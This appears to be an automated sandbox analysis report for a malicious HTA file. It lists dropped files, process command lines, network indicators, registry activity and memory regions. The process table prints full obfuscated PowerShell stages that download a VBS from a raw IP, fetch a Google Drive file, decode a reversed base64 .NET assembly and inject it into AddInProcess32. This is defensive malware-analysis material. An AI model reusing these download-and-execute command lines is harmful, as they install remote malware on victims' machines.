Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
seethebestthingstobegoodwithhislifebestthigns.hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\goodthingswithgreatcomebackwithgreatthigns[1].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES35E6.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 10:14:09 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54b0muzo.vqk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5glnbubu.znt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zq4nnja.1hl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2ex415s.ozj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fmkjxatq.stc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fzypzuob.2t3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_plh2zfhq.dsq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qi24ypfz.dy2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1ctk0mf.xnh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wexouexv.ms0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\wasjhvt4\CSCDECCDD78A6DD41E39CFBA2A99F0F744.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
|
modified
|
There are 10 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\seethebestthingstobegoodwithhislifebestthigns.hta"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX
bYpASs -NOp -w 1
-c DEvICecrEdentiaLdePlOYMent.ExE ;
Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient
= New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag
= 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex
= UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length
= '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed
= -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes =
[System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod
= [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD,
0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36
-rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES35E6.tmp"
"c:\Users\user\AppData\Local\Temp\wasjhvt4\CSCDECCDD78A6DD41E39CFBA2A99F0F744.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://drive.go
|
unknown
|
||
https://drive.google.com/uc
|
unknown
|
||
http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIF
|
192.3.176.141
|
||
https://drive.google.com
|
unknown
|
||
http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFC
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
http://drive.usercontent.google.com
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://www.microsoft.
|
unknown
|
||
http://crl.microY
|
unknown
|
||
http://go.micros
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://www.microsoft.K5
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://drive.usercontent.google.com
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 15 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
drive.google.com
|
216.58.206.78
|
||
drive.usercontent.google.com
|
142.250.186.129
|
||
198.187.3.20.in-addr.arpa
|
unknown
|
||
50.23.12.20.in-addr.arpa
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.3.176.141
|
unknown
|
United States
|
||
216.58.206.78
|
drive.google.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 8 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
5AB0000
|
heap
|
page read and write
|
||
6FE0000
|
trusted library allocation
|
page read and write
|
||
7C80000
|
trusted library allocation
|
page read and write
|
||
6523000
|
heap
|
page read and write
|
||
65AC000
|
heap
|
page read and write
|
||
2CFC000
|
heap
|
page read and write
|
||
6483000
|
heap
|
page read and write
|
||
28B8000
|
trusted library allocation
|
page read and write
|
||
54EE000
|
stack
|
page read and write
|
||
685A000
|
stack
|
page read and write
|
||
726E000
|
stack
|
page read and write
|
||
6F50000
|
trusted library allocation
|
page execute and read and write
|
||
3600000
|
heap
|
page read and write
|
||
55FC000
|
heap
|
page read and write
|
||
4901000
|
trusted library allocation
|
page read and write
|
||
6523000
|
heap
|
page read and write
|
||
652C000
|
heap
|
page read and write
|
||
32A2000
|
heap
|
page read and write
|
||
661E000
|
heap
|
page read and write
|
||
5E2F000
|
stack
|
page read and write
|
||
35EB000
|
heap
|
page read and write
|
||
7B1E000
|
stack
|
page read and write
|
||
2F50000
|
heap
|
page read and write
|
||
6442000
|
heap
|
page read and write
|
||
65AD000
|
heap
|
page read and write
|
||
547F000
|
stack
|
page read and write
|
||
32FF000
|
stack
|
page read and write
|
||
6613000
|
heap
|
page read and write
|
||
77C0000
|
trusted library allocation
|
page read and write
|
||
6DA3000
|
heap
|
page read and write
|
||
55E5000
|
heap
|
page read and write
|
||
87F5000
|
trusted library allocation
|
page read and write
|
||
2D03000
|
heap
|
page read and write
|
||
56FB000
|
trusted library allocation
|
page read and write
|
||
6620000
|
heap
|
page read and write
|
||
296C000
|
stack
|
page read and write
|
||
34D0000
|
trusted library allocation
|
page read and write
|
||
750E000
|
stack
|
page read and write
|
||
2D3F000
|
heap
|
page read and write
|
||
51EA000
|
trusted library allocation
|
page read and write
|
||
DE0000
|
heap
|
page read and write
|
||
2F0E000
|
stack
|
page read and write
|
||
33E4000
|
trusted library allocation
|
page read and write
|
||
2CA2000
|
heap
|
page read and write
|
||
676B000
|
trusted library allocation
|
page read and write
|
||
6F3E000
|
stack
|
page read and write
|
||
4D80000
|
trusted library allocation
|
page read and write
|
||
3412000
|
trusted library allocation
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
8670000
|
trusted library allocation
|
page execute and read and write
|
||
6EBE000
|
stack
|
page read and write
|
||
3615000
|
heap
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
53FA000
|
stack
|
page read and write
|
||
6483000
|
heap
|
page read and write
|
||
738E000
|
stack
|
page read and write
|
||
7620000
|
heap
|
page execute and read and write
|
||
7802000
|
heap
|
page read and write
|
||
75A0000
|
heap
|
page read and write
|
||
6550000
|
heap
|
page read and write
|
||
6494000
|
heap
|
page read and write
|
||
7CA0000
|
trusted library allocation
|
page read and write
|
||
5648000
|
heap
|
page read and write
|
||
7C70000
|
trusted library allocation
|
page read and write
|
||
55D0000
|
heap
|
page read and write
|
||
61B9000
|
trusted library allocation
|
page read and write
|
||
70F000
|
stack
|
page read and write
|
||
2CAE000
|
heap
|
page read and write
|
||
55EE000
|
stack
|
page read and write
|
||
7380000
|
heap
|
page execute and read and write
|
||
3158000
|
heap
|
page read and write
|
||
591F000
|
stack
|
page read and write
|
||
6FF0000
|
trusted library allocation
|
page read and write
|
||
445E000
|
stack
|
page read and write
|
||
651A000
|
heap
|
page read and write
|
||
55A0000
|
heap
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
55F1000
|
heap
|
page read and write
|
||
568E000
|
heap
|
page read and write
|
||
441C000
|
stack
|
page read and write
|
||
8BC0000
|
trusted library allocation
|
page read and write
|
||
2D93000
|
heap
|
page read and write
|
||
563D000
|
heap
|
page read and write
|
||
28A0000
|
heap
|
page readonly
|
||
86D0000
|
trusted library allocation
|
page read and write
|
||
72BE000
|
stack
|
page read and write
|
||
740D000
|
stack
|
page read and write
|
||
35FE000
|
heap
|
page read and write
|
||
6141000
|
trusted library allocation
|
page read and write
|
||
690C000
|
heap
|
page read and write
|
||
583A000
|
heap
|
page read and write
|
||
88C7000
|
heap
|
page read and write
|
||
5CEE000
|
stack
|
page read and write
|
||
6531000
|
heap
|
page read and write
|
||
64E9000
|
heap
|
page read and write
|
||
5478000
|
trusted library allocation
|
page read and write
|
||
55E7000
|
heap
|
page read and write
|
||
55B2000
|
heap
|
page read and write
|
||
35FE000
|
heap
|
page read and write
|
||
7581000
|
heap
|
page read and write
|
||
33EF000
|
stack
|
page read and write
|
||
27E0000
|
trusted library allocation
|
page read and write
|
||
6542000
|
heap
|
page read and write
|
||
2CA0000
|
heap
|
page read and write
|
||
88A1000
|
heap
|
page read and write
|
||
2C35000
|
heap
|
page read and write
|
||
3330000
|
heap
|
page read and write
|
||
6D6B000
|
heap
|
page read and write
|
||
560C000
|
heap
|
page read and write
|
||
6DD7000
|
heap
|
page read and write
|
||
79C3000
|
heap
|
page read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
563B000
|
heap
|
page read and write
|
||
2D5D000
|
heap
|
page read and write
|
||
339E000
|
stack
|
page read and write
|
||
64C3000
|
heap
|
page read and write
|
||
2CB3000
|
heap
|
page read and write
|
||
6655000
|
heap
|
page read and write
|
||
54F5000
|
heap
|
page read and write
|
||
485E000
|
stack
|
page read and write
|
||
559E000
|
stack
|
page read and write
|
||
7B5F000
|
stack
|
page read and write
|
||
6490000
|
heap
|
page read and write
|
||
75F0000
|
heap
|
page read and write
|
||
58C000
|
heap
|
page read and write
|
||
6550000
|
heap
|
page read and write
|
||
47D0000
|
heap
|
page execute and read and write
|
||
3080000
|
heap
|
page read and write
|
||
6950000
|
trusted library allocation
|
page execute
|
||
4C14000
|
heap
|
page read and write
|
||
6FB0000
|
trusted library allocation
|
page read and write
|
||
62EE000
|
trusted library allocation
|
page read and write
|
||
553D000
|
stack
|
page read and write
|
||
3100000
|
heap
|
page read and write
|
||
6D43000
|
heap
|
page read and write
|
||
7B10000
|
heap
|
page read and write
|
||
552B000
|
trusted library allocation
|
page read and write
|
||
8A61000
|
trusted library allocation
|
page read and write
|
||
35EC000
|
heap
|
page read and write
|
||
7BE0000
|
trusted library allocation
|
page read and write
|
||
72AE000
|
stack
|
page read and write
|
||
6542000
|
heap
|
page read and write
|
||
6684000
|
heap
|
page read and write
|
||
55FE000
|
heap
|
page read and write
|
||
6499000
|
heap
|
page read and write
|
||
499F000
|
stack
|
page read and write
|
||
3127000
|
heap
|
page read and write
|
||
64E9000
|
heap
|
page read and write
|
||
75D0000
|
heap
|
page read and write
|
||
D2B000
|
stack
|
page read and write
|
||
4743000
|
trusted library allocation
|
page execute and read and write
|
||
66B1000
|
trusted library allocation
|
page read and write
|
||
34E0000
|
heap
|
page read and write
|
||
7730000
|
trusted library allocation
|
page read and write
|
||
6686000
|
heap
|
page read and write
|
||
653E000
|
heap
|
page read and write
|
||
5E6C000
|
stack
|
page read and write
|
||
35AD000
|
heap
|
page read and write
|
||
77FE000
|
stack
|
page read and write
|
||
27C0000
|
trusted library allocation
|
page read and write
|
||
4A2E000
|
stack
|
page read and write
|
||
6523000
|
heap
|
page read and write
|
||
2CB2000
|
heap
|
page read and write
|
||
559000
|
heap
|
page read and write
|
||
6523000
|
heap
|
page read and write
|
||
65B0000
|
heap
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
64E9000
|
heap
|
page read and write
|
||
7C90000
|
heap
|
page read and write
|
||
6613000
|
heap
|
page read and write
|
||
28B0000
|
trusted library allocation
|
page read and write
|
||
648A000
|
heap
|
page read and write
|
||
7000000
|
trusted library allocation
|
page read and write
|
||
3604000
|
heap
|
page read and write
|
||
29AD000
|
stack
|
page read and write
|
||
6681000
|
heap
|
page read and write
|
||
64F6000
|
heap
|
page read and write
|
||
79F3000
|
heap
|
page read and write
|
||
57D000
|
heap
|
page read and write
|
||
71EE000
|
stack
|
page read and write
|
||
55B9000
|
heap
|
page read and write
|
||
643D000
|
heap
|
page read and write
|
||
6413000
|
heap
|
page read and write
|
||
6523000
|
heap
|
page read and write
|
||
3060000
|
heap
|
page read and write
|
||
490A000
|
trusted library allocation
|
page read and write
|
||
527D000
|
trusted library allocation
|
page read and write
|
||
744A000
|
stack
|
page read and write
|
||
74CB000
|
stack
|
page read and write
|
||
648A000
|
heap
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
35ED000
|
heap
|
page read and write
|
||
6D00000
|
heap
|
page read and write
|
||
51F9000
|
trusted library allocation
|
page read and write
|
||
8690000
|
trusted library allocation
|
page read and write
|
||
63E1000
|
heap
|
page read and write
|
||
629E000
|
stack
|
page read and write
|
||
6685000
|
heap
|
page read and write
|
||
797B000
|
heap
|
page read and write
|
||
66AC000
|
trusted library allocation
|
page read and write
|
||
65AF000
|
heap
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
35AD000
|
heap
|
page read and write
|
||
569B000
|
heap
|
page read and write
|
||
79ED000
|
heap
|
page read and write
|
||
79A5000
|
heap
|
page read and write
|
||
7ACE000
|
stack
|
page read and write
|
||
5920000
|
heap
|
page read and write
|
||
603000
|
heap
|
page read and write
|
||
7010000
|
trusted library allocation
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
77BE000
|
stack
|
page read and write
|
||
7910000
|
trusted library allocation
|
page execute and read and write
|
||
35F7000
|
heap
|
page read and write
|
||
3452000
|
trusted library allocation
|
page read and write
|
||
82AF000
|
stack
|
page read and write
|
||
661D000
|
heap
|
page read and write
|
||
2CBA000
|
heap
|
page read and write
|
||
6544000
|
heap
|
page read and write
|
||
5600000
|
heap
|
page read and write
|
||
6523000
|
heap
|
page read and write
|
||
64BE000
|
heap
|
page read and write
|
||
63E3000
|
heap
|
page read and write
|
||
6550000
|
heap
|
page read and write
|
||
648A000
|
heap
|
page read and write
|
||
55B1000
|
heap
|
page read and write
|
||
6900000
|
trusted library allocation
|
page read and write
|
||
841C000
|
stack
|
page read and write
|
||
5277000
|
trusted library allocation
|
page read and write
|
||
2CC7000
|
heap
|
page read and write
|
||
2C91000
|
heap
|
page read and write
|
||
6615000
|
heap
|
page read and write
|
||
87B0000
|
trusted library allocation
|
page read and write
|
||
4DDE000
|
stack
|
page read and write
|
||
7A20000
|
trusted library allocation
|
page read and write
|
||
48C0000
|
heap
|
page read and write
|
||
3450000
|
trusted library allocation
|
page execute and read and write
|
||
6485000
|
heap
|
page read and write
|
||
562E000
|
heap
|
page read and write
|
||
4C0F000
|
trusted library allocation
|
page read and write
|
||
5648000
|
heap
|
page read and write
|
||
4B2F000
|
trusted library allocation
|
page read and write
|
||
6A60000
|
trusted library allocation
|
page read and write
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
73AE000
|
direct allocation
|
page read and write
|
||
6542000
|
heap
|
page read and write
|
||
5830000
|
heap
|
page read and write
|
||
2CE0000
|
heap
|
page read and write
|
||
35E3000
|
heap
|
page read and write
|
||
5845000
|
heap
|
page read and write
|
||
5876000
|
trusted library allocation
|
page read and write
|
||
2CD0000
|
heap
|
page read and write
|
||
35EF000
|
heap
|
page read and write
|
||
4C1F000
|
heap
|
page read and write
|
||
8240000
|
trusted library allocation
|
page read and write
|
||
6E10000
|
trusted library allocation
|
page read and write
|
||
72E0000
|
direct allocation
|
page read and write
|
||
54E3000
|
trusted library allocation
|
page read and write
|
||
4D4D000
|
stack
|
page read and write
|
||
6B4E000
|
stack
|
